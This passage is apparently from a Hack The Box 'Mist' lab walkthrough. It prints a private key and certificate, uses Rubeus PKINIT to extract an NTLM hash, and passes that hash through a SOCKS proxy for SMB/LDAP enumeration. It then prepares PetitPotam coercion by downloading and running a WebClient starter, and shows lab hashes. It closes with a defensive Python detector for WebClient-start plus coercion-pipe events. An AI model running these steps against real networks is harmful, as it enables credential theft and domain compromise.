7wISgsgpPlhZcTRx7KfZnMB6rkk/0NW5tQO1+6rpASqivDFt2KS5i9mXAlOdlFFg
6R+3jpB8tua5eV7ECxuI3ucCgYAVxYwHuecGQgmlJqFWVdkAUsmxwy9uSsTYPL5L
YVYsuusD9A3b9SAf2O2L8jW0mayvJX4PIonZQC08hrRrcd7obdSWTeQdzg8y5tDc
PZuo3kUz7TjGLwTK9P8bxTLgRptg8Uop2sVwjWRSpTDSplvirXBciKT0rkG0mbIz
JViI2wKBgQDlodC3Ac1CQjIud888kVwmK8GshAxK/o3K4W/j/sHMjCvNsWP8cmb6
/auYR67ZiSVTThWjzunQskG0trHjHnyFmEREUWx9bGTtCiM2nkU8nRMtKBS0TU9H
601qUe1lTU6/LuU47jxxcDiC/ZPfipf/kMdEZ6BWNdX8SwK76B3JNg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGDzCCBPegAwIBAgITIwAAAD9ATHaVhun9FwAAAAAAPzANBgkqhkiG9w0BAQsF
ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEbWlzdDEV
MBMGA1UEAxMMbWlzdC1EQzAxLUNBMB4XDTI1MDYwMjE1MzUxOFoXDTI2MDYwMjE1
MzUxOFowVTETMBEGCgmSJomT8ixkARkWA2h0YjEUMBIGCgmSJomT8ixkARkWBG1p
c3QxDjAMBgNVBAMTBVVzZXJzMRgwFgYDVQQDEw9CcmFuZG9uLktleXdhcnAwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDkLlFVxMnjDghKR1necBjHhLXj
GefbnCZFqGGTuSx1YCmA/2d70YndRuQIgDrb13E5JFpcHfSCWO1TZ2cwYLF+iSBT
5jcaSe13Bo0hpBk6DOcui1Vecv2zNs7By7grs1f3ujH+8k6GEcaetilsTNf33Wpa
LjxYjLva15D+D6EQdyEPJTMnd8PmpzhB5hoLU8G1g0nm/6Wha0qlF5Qg/fwMxapt
9/J+GmWcbEJZLt7Glo+dNxz4veYOboE/OIlpqZuD6sJ4kzxTy5CNuBHJPvs9lzFS
w+51wERm/yLNjFm+6u+JunkfazVBVujLJ+DRKf4gk5Zwf4Wjwvq2prkr3o3dAgMB
AAGjggLpMIIC5TAXBgkrBgEEAYI3FAIECh4IAFUAcwBlAHIwKQYDVR0lBCIwIAYK
KwYBBAGCNwoDBAYIKwYBBQUHAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDBE
BgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAw
BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFCmbHcRn/8Dq/kVKCSj1edSt
/UbtMB8GA1UdIwQYMBaAFAJHtA9/ZUDlwTbDIo9S3fMCAFUcMIHEBgNVHR8Egbww
gbkwgbaggbOggbCGga1sZGFwOi8vL0NOPW1pc3QtREMwMS1DQSxDTj1EQzAxLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
b25maWd1cmF0aW9uLERDPW1pc3QsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlv
bkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYI
KwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1taXN0LURD
MDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZp
Y2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWlzdCxEQz1odGI/Y0FDZXJ0aWZpY2F0
ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwMwYDVR0R
BCwwKqAoBgorBgEEAYI3FAIDoBoMGEJyYW5kb24uS2V5d2FycEBtaXN0Lmh0YjBP
BgkrBgEEAYI3GQIEQjBAoD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtMTA0NTgw
OTUwOS0zMDA2NjU4NTg5LTI0MjYwNTU5NDEtMTExMDANBgkqhkiG9w0BAQsFAAOC
AQEAPPrL/9GEagrC0coCphzwDu++2yvCZ85UgqQ/u75uWwuH36rszQJZbpVd64W6
F/NOe5OmGkVlgfDGVQZllFSaR38hz03A71pDK1ENhLJhyZE0nFjMFLB9nNbucaXu
trSecISVRy5VDK75ef46dVrXIrpTcV9UI8vsqHIzkStHfwBmuLArxXBZJhjAsgWA
Eq9VOrDd9Z4P72ZC5ZafyS3b8DNoMnlIP52367e1ZgNV23C1/wFAy58gphB4DxyE
fyxMlZJF7oy5r3JMxPBbHa7l9xJmDUFwwnG4mgtzgaPwU2eecbJV/YLwHFq3ZRdL
J1DimSQ20Io7ytnHdxOTvXImrQ==
-----END CERTIFICATE-----

Then upload Brandon.Keywrap.pfx to the target machine

(node 0) >> upload /root/Desktop/htb/mist/Brandon.Keywrap.pfx ./Brandon.Keywrap.pfx
[*] File transmitting, please wait...
3.36 KiB / 3.36 KiB [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% ? p/s 0s

Use Rubeus to obtain the hash from the certificate

rubeus.exe asktgt /user:brandon.keywarp /certificate:C:\xampp\htdocs\files\Brandon.Keywrap.pfx /getcredentials /show /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGT

[*] Got domain: mist.htb
[*] Using PKINIT with etype rc4_hmac and subject: CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mist.htb\brandon.keywarp'
[*] Using domain controller: 192.168.100.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/mist.htb
  ServiceRealm             :  MIST.HTB
  UserName                 :  brandon.keywarp (NT_PRINCIPAL)
  UserRealm                :  MIST.HTB
  StartTime                :  6/2/2025 9:07:33 AM
  EndTime                  :  6/2/2025 7:07:33 PM
  RenewTill                :  6/9/2025 9:07:33 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  XEKaAEzCg3G1nn5DFlYfSQ==
  ASREP (key)              :  87C1BDF961FFA67F1BE2031C2C84FAD9

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : c

We successfully obtained the NTLM hash of the user Brandon.Keywarp: DB03D6A77A2205BC1D07082740626CC9

3.4. Setting up a proxy

Because we are inside the internal network, working through a single shell on Windows is inconvenient: many tools on Kali cannot be used, since they cannot reach the internal network.

Set up a proxy with Stowaway

(node 0) >> socks 1123
[*] Trying to listen on 0.0.0.0:1123......
[*] Waiting for agent's response......
[*] Socks start successfully!

3.5. SMB enumeration

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# proxychains -q nxc smb 192.168.100.100 -u brandon.keywarp -H 'DB03D6A77A2205BC1D07082740626CC9' --shares
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False) 
SMB         192.168.100.100 445    DC01             [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9 
SMB         192.168.100.100 445    DC01             [*] Enumerated shares
SMB         192.168.100.100 445    DC01             Share           Permissions     Remark
SMB         192.168.100.100 445    DC01             -----           -----------     ------
SMB         192.168.100.100 445    DC01             ADMIN$                          Remote Admin
SMB         192.168.100.100 445    DC01             C$                              Default share
SMB         192.168.100.100 445    DC01             IPC$            READ            Remote IPC
SMB         192.168.100.100 445    DC01             NETLOGON        READ            Logon server share 
SMB         192.168.100.100 445    DC01             SYSVOL          READ            Logon server share 

Nothing exploitable here.

3.6. Creating a fake machine account

First we need to check how many machine accounts the current user can still add

# PowerShell
Get-AdObject -Identity ((Get-AdDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# proxychains -q nxc ldap 192.168.100.100 -u brandon.keywarp -H 'DB03D6A77A2205BC1D07082740626CC9' -M maq
LDAP        192.168.100.100 389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:mist.htb)
LDAP        192.168.100.100 389    DC01             [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9 
MAQ         192.168.100.100 389    DC01             [*] Getting the MachineAccountQuota
MAQ         192.168.100.100 389    DC01             MachineAccountQuota: 0 # 0 means we cannot add machine accounts

4. NTLM Relay

4.1. PetitPotam Attack

To perform an NTLM relay, we first need to check whether session signing is in place

Note

Session signing is a powerful but limited mitigation against NTLM relay, and only SMB and LDAP can use it.

  • SMB signing works on a "least requirement" basis: if neither the client nor the server requires signing, the session is not signed (e.g. for performance reasons)
  • LDAP signing works on a "most requirement" basis: if both the client and the server support signing, they sign the session

Use NXC to check whether session signing and channel binding are enabled

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# proxychains -q nxc ldap 192.168.100.100 -u brandon.keywarp -H 'DB03D6A77A2205BC1D07082740626CC9' -M ldap-checker
LDAP        192.168.100.100 389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:mist.htb)
LDAP        192.168.100.100 389    DC01             [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9 
LDAP-CHE... 192.168.100.100 389    DC01             LDAP signing NOT enforced # no session signing
LDAP-CHE... 192.168.100.100 389    DC01             LDAPS channel binding is set to: Never # not enabled

Neither is enabled here, so we can try the PetitPotam tool to force Windows to authenticate to us as MS01$, and thereby capture the hash of the MS01$ account

There are two problems here:

  • The WebClient service that PetitPotam relies on is not running
  • The attack also needs a DNS name for the machine account's authentication; we have no permission to create a DNS record on the domain controller, but this can be handled with tunneling

The current user cannot enumerate the state of the WebClient service

PS C:\xampp\htdocs\files> sc.exe query webclient 2>&1
sc.exe query webclient 2>&1
[SC] EnumQueryServicesStatus:OpenService FAILED 5:

Access is denied.

However, the service can be started with the C# program EtwStartWebClient.cs. First save the file and compile it with mono (apt install mono-mcs)

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# wget https://gist.githubusercontent.com/klezVirus/af004842a73779e1d03d47e041115797/raw/29747c92ca04c844223d1ef6c1463d7e34e271ee/EtwStartWebClient.cs
--2025-06-02 13:18:25--  https://gist.githubusercontent.com/klezVirus/af004842a73779e1d03d47e041115797/raw/29747c92ca04c844223d1ef6c1463d7e34e271ee/EtwStartWebClient.cs
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 198.18.1.247
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|198.18.1.247|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3691 (3.6K) [text/plain]
Saving to: ‘EtwStartWebClient.cs’

EtwStartWebClient.cs          100%[=================================================>]   3.60K  --.-KB/s    in 0.005s  

2025-06-02 13:18:26 (773 KB/s) - ‘EtwStartWebClient.cs’ saved [3691/3691]  
┌──(root㉿kali)-[~/Desktop/htb/mist]                                        
└─# mcs EtwStartWebClient.cs /unsafe

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# file EtwStartWebClient.exe 
EtwStartWebClient.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

Upload EtwStartWebClient.exe to the target and run it

C:\xampp\htdocs\files>.\EtwStartWebClient.exe
.\EtwStartWebClient.exe
[+] WebClient Service started successfully

Note: this gets cleaned up periodically, so we have to capture the hash quickly

[Screenshot: Pasted image 20250603013316.png]

MS01$::MIST:059d9f988ca3fd4c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
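
From the defender's side, the chain above leaves two distinct traces: the WebClient service entering the running state on a server where it is normally stopped (System log, Service Control Manager event 7036), followed shortly by a named-pipe access under IPC$ to one of the RPC interfaces used for authentication coercion (Security log, event 5145, which records the pipe name as the relative target). The script below is an added example, not part of the writeup or of any tool used in it; it correlates those two signals over constructed event records shaped after the two event types. Host names, times, the subject account and the source IP in the sample are constructed for illustration.

```python
"""Correlate a WebClient service start with follow-on coercion-pipe access.

Constructed example: the EVENTS list mimics the fields of Windows System
event 7036 (service state change) and Security event 5145 (network share
object access; for IPC$ the target is the named pipe), not real captures.
"""
from datetime import datetime, timedelta

# Named pipes behind RPC interfaces commonly used to coerce machine authentication
COERCION_PIPES = {"efsrpc", "lsarpc", "samr", "netlogon", "lsass"}

# Constructed sample events (not real log captures)
EVENTS = [
    {"log": "System", "id": 7036, "host": "MS01", "time": "2025-06-02T13:20:01",
     "message": "The WebClient service entered the running state."},
    {"log": "System", "id": 7036, "host": "DC01", "time": "2025-06-02T13:20:05",
     "message": "The Windows Update service entered the running state."},
    {"log": "Security", "id": 5145, "host": "MS01", "time": "2025-06-02T13:21:10",
     "subject": "MIST\\brandon.keywarp", "source_ip": "192.168.100.101",
     "share": "\\\\*\\IPC$", "target": "efsrpc"},
    {"log": "Security", "id": 5145, "host": "DC01", "time": "2025-06-02T13:21:30",
     "subject": "MIST\\brandon.keywarp", "source_ip": "192.168.100.101",
     "share": "\\\\*\\IPC$", "target": "srvsvc"},
    {"log": "Security", "id": 5145, "host": "DC01", "time": "2025-06-02T15:40:00",
     "subject": "MIST\\svc_backup", "source_ip": "192.168.100.50",
     "share": "\\\\*\\IPC$", "target": "lsarpc"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def webclient_starts(events):
    """(host, time) for every 7036 event reporting WebClient entering the running state."""
    return [(e["host"], _ts(e)) for e in events
            if e["log"] == "System" and e["id"] == 7036
            and e["message"].startswith("The WebClient service entered the running state")]


def coercion_pipe_accesses(events):
    """5145 events whose IPC$ target is one of the coercion-related named pipes."""
    return [e for e in events
            if e["log"] == "Security" and e["id"] == 5145
            and e["share"].endswith("IPC$") and e["target"].lower() in COERCION_PIPES]


def correlate(events, window=timedelta(minutes=10)):
    """Alerts (host, subject, source_ip, pipe): a WebClient start on a host followed
    within `window` by a coercion-pipe access on the same host."""
    starts = webclient_starts(events)
    alerts = []
    for e in coercion_pipe_accesses(events):
        for host, started in starts:
            if e["host"] == host and started <= _ts(e) <= started + window:
                alerts.append((host, e["subject"], e["source_ip"], e["target"]))
    return alerts


if __name__ == "__main__":
    for host, who, ip, pipe in correlate(EVENTS):
        print(f"[!] {host}: WebClient started, then {who} from {ip} opened \\pipe\\{pipe}")
```

The lone lsarpc access on DC01 is deliberately not alerted by `correlate`: on its own it is ordinary directory traffic, which is why the WebClient start is the stronger anchor for this particular chain. A stricter policy for servers that should never run WebClient would alert on the 7036 event alone, which `webclient_starts` already returns.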